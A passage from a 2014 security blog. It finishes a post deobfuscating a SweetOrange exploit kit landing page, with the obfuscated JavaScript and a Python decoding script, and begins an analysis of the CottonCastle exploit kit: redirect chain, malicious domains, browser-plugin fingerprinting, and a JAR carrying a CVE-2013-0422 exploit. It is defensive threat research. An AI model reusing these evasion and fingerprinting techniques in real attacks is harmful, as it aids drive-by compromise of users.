The value returned is passed through '<span style="color: #3d85c6;">.replace</span>' where any occurrence of '<span style="color: #3d85c6;">AdgSf344_42</span>' string is removed and then '<span style="color: #3d85c6;">.substring</span>' cuts off first 70 characters and what's left is stored in another variable called - '<span style="color: #3d85c6;">JvUhBCJkFV</span>'. Note the string that's being removed - '<span style="color: #3d85c6;">AdgSf344_42</span>'. This string is repeatedly present all over the data blob, so it's safe enough to assume that these '<span style="color: #3d85c6;">replace</span>' and '<span style="color: #3d85c6;">substring</span>' operations are performed on the data stored in the blob. Now let's trace '<span style="color: #3d85c6;">JvUhBCJkFV</span>' variable.<br />
<br />
<pre class="prettyprint">JvUhBCJkFV = JvUhBCJkFV["CmYhLBWtlcUAuPllrQzwcR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "QeTyvpnauVDwgPrSyUmddePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "hSReqJbsEYDVGYtSdMaKvAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/__hhg7_/, "<");
JvUhBCJkFV = JvUhBCJkFV["DFhBbAbrvTfutCnsmdcFnR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "pxUBkDdBwEcWypAIICsrJePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "mVrJDwMWDZuUhgpMZSmVEAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/__Db8__/, ">");
JvUhBCJkFV = JvUhBCJkFV["QOmUjeNOFcQYONcLQZAtOR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "bWXExXVfqvcqeIuyNfJaRePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "iebFbNjCVybBwfEvorJqqAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/_uio0__/, "&");
JvUhBCJkFV = JvUhBCJkFV["oZBZyFhKBOkJHNmWnmNCKR".charAt((Math.acos(1) + 1) * 21).toString().toLowerCase() + "PIPoCStPfHZIWGgmYzekFePl".substr((Math.acos(1) + 1) * 21, 3).toLowerCase() + "gfAOlzFwZvghrQYqhRPhnAce".toLowerCase().substr((Math.acos(1) + 1) * 21, 3)](/__cc0__/, "%");</pre>
<br />
This is a little bit hard to read, isn't it? This is another type of code obfuscation used in this sample. Thought it's not something I want to cover in this post, let's deobfuscate it for the sake of easiness. Simply taking the code enclosed into square brackets and evaluating it using a JS sandbox yields the code below.<br />
<br />
<pre class="prettyprint">JvUhBCJkFV = JvUhBCJkFV.replace(/__hhg7_/, "<");
JvUhBCJkFV = JvUhBCJkFV.replace(/__Db8__/, ">");
JvUhBCJkFV = JvUhBCJkFV.replace(/_uio0__/, "&");
JvUhBCJkFV = JvUhBCJkFV.replace(/__cc0__/, "%");</pre>
<br />
More replacements!! Ok, let's do all of the above replacements and see if we get some readable code. The following simple Python script will help us do it:<br />
<br />
<pre class="prettyprint">def readFile(filename):
fo = open(filename, "rb")
textFile = fo.read()
fo.close()
return textFile
encodedString = readFile('SW_landing.txt')
encodedString = encodedString[70:]
encodedString = encodedString.replace('AdgSf344_42', '')
encodedString = encodedString.replace('__hhg7_', '<')
encodedString = encodedString.replace('__Db8__', '>')
encodedString = encodedString.replace('_uio0__', '&')
encodedString = encodedString.replace('__cc0__', '%')
print(encodedString)</pre>
<br />
Before running it, we'll need to save the data blob into '<span style="color: #3d85c6;">SW_landing.txt</span>' file
and place it in the same folder with the Python script. If you ever need to deobfuscate another SweetOrange EK landing page using this script, keep in mind that the replacement strings can change, though so
far I've only seen '<span style="color: #3d85c6;">.substring</span>' value and the first replacement string changing.<br />
<br />
After running the script we get the <a href="http://pastebin.com/WEcB6XTQ" rel="nofollow" target="_blank">output</a>. With the exception to some base64 encoded strings, the code is pretty readable and can be analyzed further if required. Now let's sum things up a little bit.<br />
<br />
So, from the data/code obfuscation perspective SweetOrange EK landing page contains a relatively big blob of obfuscated data and a JavaScript to deobfuscate it into yet another JavaScript. The deobfuscation is implemented through a series of simple replacement operations. <a href="http://en.wikipedia.org/wiki/KISS_principle" rel="nofollow" target="_blank">KISS</a>.<br />
<br />
<br />
Happy deobfuscation!<br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-32573663891594028092014-06-08T23:45:00.000+01:002014-06-11T09:29:44.471+01:00CottonCastle EK: "I hate to break this to you, but this isn't gonna be an open casket."NOTE: The information is based on a sample captured on 2014-06-06<br />
<br />
Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing this sample.<br />
<br />
<u><i>Update 2014-06-10</i></u>: <a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a> <a href="http://malware.dontneedcoffee.com/2014/06/cottoncastle.html" rel="nofollow" target="_blank">shared</a> his experience with this exploit kit. Covers the history of the name, how it was first detected and what other exploits it has in its arsenal.<br />
<br />
<b><span style="color: #3d85c6;">Whenever there is any doubt, there is no doubt</span></b><br />
<br />
It's a rather interesting name for an exploit kit. Trying to find any references to '<span style="color: #3d85c6;">Cotton Castle</span>' you end up with links pointing at an amazing looking location in Turkey - <a href="http://en.wikipedia.org/wiki/Pamukkale" rel="nofollow" target="_blank">Pamukkale</a>. I can't be sure if the exploit kit name tips you off on the country of the origin, but let's find out what it's made of to be sure we better understand this threat.<br />
<br />
In this particular sample a compromise attempt started with visiting a webpage with a link to a JavaScript that starts the redirect chain. The following HTTP traffic was observed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrnImG-aGEx4P2NK3kdXvhrUSbolykrogLuCV_-ZyFlojO-WtiH-NYzQmvYNVcH7pj1H1o-kPKShWsXbtXob64SShrmAenjAAbeiMiBpairyxSKM77hrLUp0NT0DRHE1mh92U62qhfsYdO/s1600/HTTP_traffic.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrnImG-aGEx4P2NK3kdXvhrUSbolykrogLuCV_-ZyFlojO-WtiH-NYzQmvYNVcH7pj1H1o-kPKShWsXbtXob64SShrmAenjAAbeiMiBpairyxSKM77hrLUp0NT0DRHE1mh92U62qhfsYdO/s1600/HTTP_traffic.PNG" height="61" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' HTTP traffic</span></i></div>
<br />
The JavaScript starting the redirect chain is '<span style="color: #3d85c6;">jquery.place.min.js</span>'. According to almighty Google Search, the name belongs to a legit JavaScript application developed by '<a href="http://codecanyon.net/user/designcise" rel="nofollow" target="_blank">Designcise</a>' and meant to assist web developers with organizing a webpage content. Nevertheless, in this particular case that's not what this script is doing at all. The script appears to be checking the following before initiating a redirect:<br />
<ul>
<li>presence of the word '<span style="color: #3d85c6;">government</span>' in the current session '<span style="color: #3d85c6;">cookies</span>'</li>
<li>types of '<span style="color: #3d85c6;">frames</span>', '<span style="color: #3d85c6;">XMLHttpRequest</span>', '<span style="color: #3d85c6;">mozSetImageElement</span>'</li>
<li>monitoring users interaction with the webpage - mouseovers, clicks and movements</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF2crpGt00o96-RLOMOji6q_TGLNxJ8JbEI_lSJWNKxrTWcbaBs_bDIuKeWzjKe8Xq6PW_rKMol14o6Q9B1csUcWCEdFaEHXTdscwnWVa7KgoqIDjqFHGEjc8kihy3Ea5nEpoaU7Wnd6/s1600/JS_cookie&types_check.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9fF2crpGt00o96-RLOMOji6q_TGLNxJ8JbEI_lSJWNKxrTWcbaBs_bDIuKeWzjKe8Xq6PW_rKMol14o6Q9B1csUcWCEdFaEHXTdscwnWVa7KgoqIDjqFHGEjc8kihy3Ea5nEpoaU7Wnd6/s1600/JS_cookie&types_check.PNG" height="35" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript checking browser '<span style="color: #3d85c6;">cookies</span>' and some element types</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivZ7StO6u6OHMgjoKpB6bjY2OYYBXRlxoSTBElIby-6Vl7vXYqZNVrbQ8oM9SMQ8v369APaJNXBcS69UkQFEznYICmr2kebBmeTHVZhwxkZdvWmFY7C0YSRugLnS7iMxKlFm2J1MeqlolY/s1600/JS_mouse_monitoring.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivZ7StO6u6OHMgjoKpB6bjY2OYYBXRlxoSTBElIby-6Vl7vXYqZNVrbQ8oM9SMQ8v369APaJNXBcS69UkQFEznYICmr2kebBmeTHVZhwxkZdvWmFY7C0YSRugLnS7iMxKlFm2J1MeqlolY/s1600/JS_mouse_monitoring.PNG" height="140" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript hooking mouse activity</span></i></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL-3N3RwjpcR9Hxszgd1aj2jKlmhcTIDHbNPIahh2WfV3f3vK8BxRSpWLfdulmcAxgHNjpgI3YXwieJnPxsiaJgA171Pq9DlLm1X6Jp7IUWBYJwW_Y2hTxEVcwSdbVpsGucM-yUSdgPY7c/s1600/JS_event_listener&actioner.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL-3N3RwjpcR9Hxszgd1aj2jKlmhcTIDHbNPIahh2WfV3f3vK8BxRSpWLfdulmcAxgHNjpgI3YXwieJnPxsiaJgA171Pq9DlLm1X6Jp7IUWBYJwW_Y2hTxEVcwSdbVpsGucM-yUSdgPY7c/s1600/JS_event_listener&actioner.PNG" height="46" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript showing '<span style="color: #3d85c6;">EventListener</span>' and '<span style="color: #3d85c6;">attachEvent</span>'</span></i></div>
<br />
Once the required for redirect conditions are met, the browser is redirected to an HTML page containing another JavaScript.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilL-cSuj9_HXxdFg6ArwrSzkYGHPthPjqtPTPKERKtp3fkgr3I9mEMRNth5eRMCptvYt8Aa4bsHg5UsgBI2_tSUz_07CSFU32oWJMnx2uLl60LocXtSSM1JT9UMPl1cHuW39Cg5sQIXaBV/s1600/JS_redirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilL-cSuj9_HXxdFg6ArwrSzkYGHPthPjqtPTPKERKtp3fkgr3I9mEMRNth5eRMCptvYt8Aa4bsHg5UsgBI2_tSUz_07CSFU32oWJMnx2uLl60LocXtSSM1JT9UMPl1cHuW39Cg5sQIXaBV/s1600/JS_redirect.PNG" height="132" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript showing the function initiating the redirect</span></i></div>
<br />
This type of behaviour could be found with some of the news/ads reach websites where additional content is pulled based on user's webpage interaction and in this case might be exactly that, but we'll carry on assuming this activity is a malicious.<br />
<br />
The webpage the browser is taken to is rather simple in terms of the content - 1 line of text that looks like a news headline.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCPfgpNMX7E6P0OoalGVN_Y7GlX37s03hX7o2OVItaoc0BVf2zQUdm7wzWUWphSMZ06Qz6dUgoA3lDhbGl2VjLjMMsPJvc0FJK2QO6k-7QZZ73tZWw_cG0OgSd-B9AyB4VX52nN61ranus/s1600/first_HTML.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCPfgpNMX7E6P0OoalGVN_Y7GlX37s03hX7o2OVItaoc0BVf2zQUdm7wzWUWphSMZ06Qz6dUgoA3lDhbGl2VjLjMMsPJvc0FJK2QO6k-7QZZ73tZWw_cG0OgSd-B9AyB4VX52nN61ranus/s1600/first_HTML.PNG" height="57" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of the page showing the line of text and an <iframe></span></i></div>
<br />
Let's take a look at some <a href="http://who.is/whois/leveloped.in" rel="nofollow" target="_blank">WHOIS</a> data for the domain hosting this page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgriZQ6-d5B8qly_X8KgOmd7QYkrWh_NOA2KsLeQ7HFltYYv9Lk7B7d6f4CWEPBf3mjXgAuwLT2rWxTmwAm3wRqzkCtr7dDSb2zkBj5IAqI0C28laQd7Rqa-lcbBo0QBLZSZJ4GJHO0_BX/s1600/whois.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgriZQ6-d5B8qly_X8KgOmd7QYkrWh_NOA2KsLeQ7HFltYYv9Lk7B7d6f4CWEPBf3mjXgAuwLT2rWxTmwAm3wRqzkCtr7dDSb2zkBj5IAqI0C28laQd7Rqa-lcbBo0QBLZSZJ4GJHO0_BX/s1600/whois.PNG" height="320" width="214" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Extract from WHOIS results for '<span style="color: #3d85c6;">leveloped.in</span>'</span></i></div>
<br />
Doesn't appear to be well '<span style="color: #3d85c6;">hidden</span>' if it was registered with a malicious intention, once again, making me think that this could be just a case of a compromised news/ad feed. Anyway, let's focus on the '<span style="color: #3d85c6;"><iframe></span>' link that leads to another webpage.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj09yHb8JFUkoNro5hAkVRKtlKEABcc3CUgMl79kK0Dysrf1t7XjsR1-fMlJEhzMTLHeCJJ5aCIVa8Co78WiZwXqnhzwRIpXZPXviwfDZUI7U4V8zDvIe5KMrYxaaPlASqmo6HThGKQ91jW/s1600/second_HTML.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj09yHb8JFUkoNro5hAkVRKtlKEABcc3CUgMl79kK0Dysrf1t7XjsR1-fMlJEhzMTLHeCJJ5aCIVa8Co78WiZwXqnhzwRIpXZPXviwfDZUI7U4V8zDvIe5KMrYxaaPlASqmo6HThGKQ91jW/s1600/second_HTML.PNG" height="146" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of the second HTML page in the redirect chain</span></i></div>
<br />
Note yet another JavaScript URI that looks like a request for an ad banner - '<span style="color: #3d85c6;">static.js?ads-banner=1620850</span>'.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIhMrF95bKZJcpIPiKBjctmg19uGoWNGhDn3ewGrbvzO7qfm0THacRnl3HKglQfYaQtck88DsXsmPyfZ_qnLBYV0S4hsCC2fFc4vadjKyJG5muXezdgEICfN3fgDnmGZULcOFhf-xAFTPK/s1600/JS_EK_landing_redirect.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIhMrF95bKZJcpIPiKBjctmg19uGoWNGhDn3ewGrbvzO7qfm0THacRnl3HKglQfYaQtck88DsXsmPyfZ_qnLBYV0S4hsCC2fFc4vadjKyJG5muXezdgEICfN3fgDnmGZULcOFhf-xAFTPK/s1600/JS_EK_landing_redirect.PNG" height="185" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript redirecting to EK landing page</span></i></div>
<br />
'<span style="color: #3d85c6;">Surprisingly</span>', there is no ad banner in the response. Instead it contains a lightly obfuscated JavaScript that compiles the next URL in the redirect chain. It takes a predefined URL, adds the referrer to it and requests the resulting URL.<br />
<br />
This was the last redirect in the chain, so the browser finally arrives on the '<span style="color: #3d85c6;">CottonCastle EK</span>' landing page. Before we proceed with the analysis of the EK parts, let's quickly sum up what we've found so far and speculate a little bit about it. It's hard to tell for sure where the actual badness starts. Technically, it would be fair to say it starts from the very first page we landed on - '<span style="color: #3d85c6;">ru.hellomagazine.com/tags/40-viktoriya_bonya.html</span>', but we should also consider a scenario where the first redirect to '<span style="color: #3d85c6;">leveloped.in/government/70d83bde3d5f7e09/</span>' through '<span style="color: #3d85c6;">ru.hellomagazine.com/js/jquery.place.min.js?i=1400557776</span>' JavaScript could be a normal operational mode for '<span style="color: #3d85c6;">ru.hellomagazine.com</span>' to pull news/advertisement content for its web pages. So, in this case the news/ad feed is compromised and more likely begins at '<span style="color: #3d85c6;">expokot.com/hilosifipu/static.js?ads-banner=1620850</span>'. On the other hand, all domain names involved in the delivery of news/ad feeds could be a part of a well organised malvertising network and the redirect initiating link has been maliciously injected into '<span style="color: #3d85c6;">ru.hellomagazine.com</span>' website pages. Alright, that would be enough for speculations.<br />
<br />
<b><span style="color: #3d85c6;">The statement below is true. </span></b><br />
<b><span style="color: #3d85c6;">The statement above is false.</span></b><br />
<br />
The server replies with 203 HTTP status code when the landing page is requested. More likely, a rather unusual status code is being used by the server side of '<span style="color: #3d85c6;">CottonCaste EK</span>' for some internal processing or it could be specific to this particular sample only. String variables on the landing page are lightly obfuscated.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaq_DEJm4Tq3y0ZwpdUty5jFVSJiF0c3eRIrTieuGkZ8FyjxUZapd1pZ6De5BZG__8f7LACJq0AsOXuvZG1tNXoPdS3lf7odSh2MlzzynVjZsuiW6YQhb6M3FSKWfI-U3IcvhN6XRrnZ49/s1600/string_obfuscation_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaq_DEJm4Tq3y0ZwpdUty5jFVSJiF0c3eRIrTieuGkZ8FyjxUZapd1pZ6De5BZG__8f7LACJq0AsOXuvZG1tNXoPdS3lf7odSh2MlzzynVjZsuiW6YQhb6M3FSKWfI-U3IcvhN6XRrnZ49/s1600/string_obfuscation_example.PNG" height="8" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' string obfuscation example</span></i></div>
<br />
On top of that, the code is padded/fragmented by comment blocks.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dne1-PkLAm6xLFSGMsX_fRRet5xYfOnvHAv4EIWqlYOLzpkdalu5jHaSuGLheSdmK_3_P_Snq1k08sa-XwhH4y-Vgdc2C6IMZPVXQj9_J0Ws225Twtgnj-WJr7a6__8JHiS8yIuQlVoF/s1600/comments_padding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0dne1-PkLAm6xLFSGMsX_fRRet5xYfOnvHAv4EIWqlYOLzpkdalu5jHaSuGLheSdmK_3_P_Snq1k08sa-XwhH4y-Vgdc2C6IMZPVXQj9_J0Ws225Twtgnj-WJr7a6__8JHiS8yIuQlVoF/s1600/comments_padding.png" height="21" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' comment blocks fragmentation example</span></i></div>
<br />
As a first step, the code will launch an '<span style="color: #3d85c6;"><applet></span>' containing a Java application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoqzgoWdzv6THmLR-IE-ou-btT42iOifaD7I7Wt6DX-GUNaH_kTmfnCLn4sBv2wvw02mwjKi9wOMpDnwbBKIcZC_PrvRPzGpBx1leL1S7JTW2e59TAoloXUSW3e20F8vPwbo0h1uexcOK/s1600/JavaFX_applet.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOoqzgoWdzv6THmLR-IE-ou-btT42iOifaD7I7Wt6DX-GUNaH_kTmfnCLn4sBv2wvw02mwjKi9wOMpDnwbBKIcZC_PrvRPzGpBx1leL1S7JTW2e59TAoloXUSW3e20F8vPwbo0h1uexcOK/s1600/JavaFX_applet.PNG" height="18" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;"><applet></span>' launching Java application</span></i></div>
<br />
Next, the code will attempt to create a '<span style="color: #3d85c6;">ShockwaveFlash</span>' ActiveXObject and if successful will identify its version.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_a8nBqWZa92GjixrUMA3H_0wNsXY7ho4Q7cWXv0k9lygIYa-nPpxgldV3bCuw0pc-3gtHUwDD14Vz7UNPU8EE2XYyGbaP0La-koA8Ne3D3VvtVY0DitxF6r-AhumpHOmMuDpKNYFzmWAz/s1600/ShockwaveFlash_ident.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_a8nBqWZa92GjixrUMA3H_0wNsXY7ho4Q7cWXv0k9lygIYa-nPpxgldV3bCuw0pc-3gtHUwDD14Vz7UNPU8EE2XYyGbaP0La-koA8Ne3D3VvtVY0DitxF6r-AhumpHOmMuDpKNYFzmWAz/s1600/ShockwaveFlash_ident.PNG" height="7" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript code that creates a '<span style="color: #3d85c6;">ShockwaveFlash</span>' ActiveXObject</span></i></div>
<br />
Version value returned will be broken down into individual number values and stored as an array. The array will be converted into a string by XORing each array element by a static key '<span style="color: #3d85c6;">343</span>' and adding them together. The resulting string will be passed to a function that generates a GET request using a pre-defined URI and the passed ShockwaveFlash version value, plus, a bunch of other pre-defined parameters stored as HEX strings.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpFaMzDtciqDk3wplGWjlIyISec09X1Rp4yB8UjIs8dWNy5GQsRQQhsUo8uwsc5EIYJjgbXhZgLXDZekjItX1RAyns0MsvqFgoGIlCuXJ_8klbScLYW8ZxkrnBctTIJ5WWNetGhVJolz3Y/s1600/ShockwaveFlash_request.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpFaMzDtciqDk3wplGWjlIyISec09X1Rp4yB8UjIs8dWNy5GQsRQQhsUo8uwsc5EIYJjgbXhZgLXDZekjItX1RAyns0MsvqFgoGIlCuXJ_8klbScLYW8ZxkrnBctTIJ5WWNetGhVJolz3Y/s1600/ShockwaveFlash_request.PNG" height="26" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript generating GET request for a ShockwaveFlash component</span></i></div>
<br />
Just for a little bit of extra fun, we can find what version of Shockwave Flash Player was installed on the machine this particular sample of '<span style="color: #3d85c6;">CottonCastle EK</span>' was captured from. Here is the part of GET request corresponding to this sample - '<span style="color: #3d85c6;">/forum/tracker/3/ON/0dc93648889f84dcc7f0f70c25fbe9c6/349.341.456.342/</span>'. If we take each individual numeric value from '<span style="color: #3d85c6;">/349.341.456.342/</span>' and XOR it by '<span style="color: #3d85c6;">343</span>' we get the version of Shockwave Flash Player - '<span style="color: #3d85c6;">10.2.159.1</span>'.<br />
<br />
This particular GET request received HTTP 409 response. I assume that the server side of '<span style="color: #3d85c6;">CottonCastle EK</span>' responds with HTTP 409 Status code when it decides not to serve the exploit component or something went wrong sending it.<br />
<br />
Lastly, another JavaScript on the landing page will try to identify '<span style="color: #3d85c6;">ScriptEngineMajorVersion</span>', '<span style="color: #3d85c6;">ScriptEngineMinorVersion</span>' and '<span style="color: #3d85c6;">ScriptEngineBuildVersion</span>' values. Like in the case with '<span style="color: #3d85c6;">ShockwaveFlash</span>' version values, each of the found values will be XORed by '<span style="color: #3d85c6;">343</span>' and the resulting string passed to a function that generates a GET request using a pre-defined URI and the value passed. The request initiation is set on a 2.5 seconds timer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijqKP8iorTTTVEs-Cak0SB010eQjt6hJvndGKa5YLMu167mA7fl4MhauavwEtHMWWcm3c3fyVa9wpBbIp9D2RZNaAegplyGskBGiz5kWqcQjLRAfWDrDIItJA0VyF4j-a6SOTGO3Z16HCR/s1600/IE_request.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijqKP8iorTTTVEs-Cak0SB010eQjt6hJvndGKa5YLMu167mA7fl4MhauavwEtHMWWcm3c3fyVa9wpBbIp9D2RZNaAegplyGskBGiz5kWqcQjLRAfWDrDIItJA0VyF4j-a6SOTGO3Z16HCR/s1600/IE_request.PNG" height="81" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript generating GET request using detected values</span></i></div>
<br />
So, the Java application will be requested and executed first. The request is implemented using JNLP file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglGdYzCnE5OWPDLF0dNPAHrxi86OtzoLdZOJwOJaX1bQXB9AvBm7xcUJeyPnwm9Le605KmgXP5tNKzScfG6sSNgtbMwsl87A3wbbBVOZKhsImYywRn512rC4Dc8cHLzZM1EqFGvaqipix9/s1600/JNLP.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglGdYzCnE5OWPDLF0dNPAHrxi86OtzoLdZOJwOJaX1bQXB9AvBm7xcUJeyPnwm9Le605KmgXP5tNKzScfG6sSNgtbMwsl87A3wbbBVOZKhsImYywRn512rC4Dc8cHLzZM1EqFGvaqipix9/s1600/JNLP.PNG" height="106" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' Java application JNLP file</span></i></div>
<br />
Surprisingly, JNLP file has no '<span style="color: #3d85c6;">Security Warning Window</span>' bypass attributes and interestingly enough other attributes are properly named. According to the naming, this Java application is called '<span style="color: #3d85c6;">jBitTorrent Client</span>' that provides '<span style="color: #3d85c6;">Java implementation of the bittorrent protocol</span>' and will run on '<span style="color: #3d85c6;"><j2se version="1.6+" /></span>'. The execution starts with '<span style="color: #3d85c6;">com.s</span>' class file. Let's take a look at the JAR file content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSaV_UvfuSgm2O6N7Ox_dwZfLol80VTksFq15A4-9ySMeL9Cd6BWMy5N-QZSJ35t9JMI6xk4AOkYNAq3_rfqHHgQjCD3jAYIehktpz989DA60W3WlEpnWY7LOOBDkvHOWCyndW04UOHgl/s1600/JAR_content.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSaV_UvfuSgm2O6N7Ox_dwZfLol80VTksFq15A4-9ySMeL9Cd6BWMy5N-QZSJ35t9JMI6xk4AOkYNAq3_rfqHHgQjCD3jAYIehktpz989DA60W3WlEpnWY7LOOBDkvHOWCyndW04UOHgl/s1600/JAR_content.PNG" height="320" width="221" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">'<span style="color: #3d85c6;">CottonCastle EK</span>' JAR file structure</span></i></div>
<br />
The two class files '<span style="color: #3d85c6;">s.class</span>' and '<span style="color: #3d85c6;">t.class</span>' contain a '<span style="color: #3d85c6;">wrapper</span>' code. In a nutshell, the code decrypts and loads some of the JAR file components. The '<span style="color: #3d85c6;">.dat</span>' files included in the JAR file serve different purpose:<br />
<ul>
<li>'<span style="color: #3d85c6;">d.dat</span>' - Windows PE executable</li>
<li>'<span style="color: #3d85c6;">j.dat</span>' - operating system reconnaissance, payload download and execution</li>
<li>'<span style="color: #3d85c6;">p.dat</span>' - JVM parameters collector, execution path selector</li>
<li>'<span style="color: #3d85c6;">u.dat</span>' - exploit code for <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422" rel="nofollow" target="_blank">CVE-2013-0422</a> (JmxMBeanServer)</li>
</ul>
Every '<span style="color: #3d85c6;">.dat</span>' file is RC4 encrypted. The decryption key is stored in '<span style="color: #3d85c6;">adv</span>' parameter passed to JVM. In this particular sample it was - '<span style="color: #3d85c6;">OrbitWhite</span>'.<br />
<br />
The Java code is fairly obfuscated. String values are also encrypted with RC4(using the same decryption key) and stored in HEX representation. '<span style="color: #3d85c6;">java.lang.reflect.Method</span>' features are used a lot.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
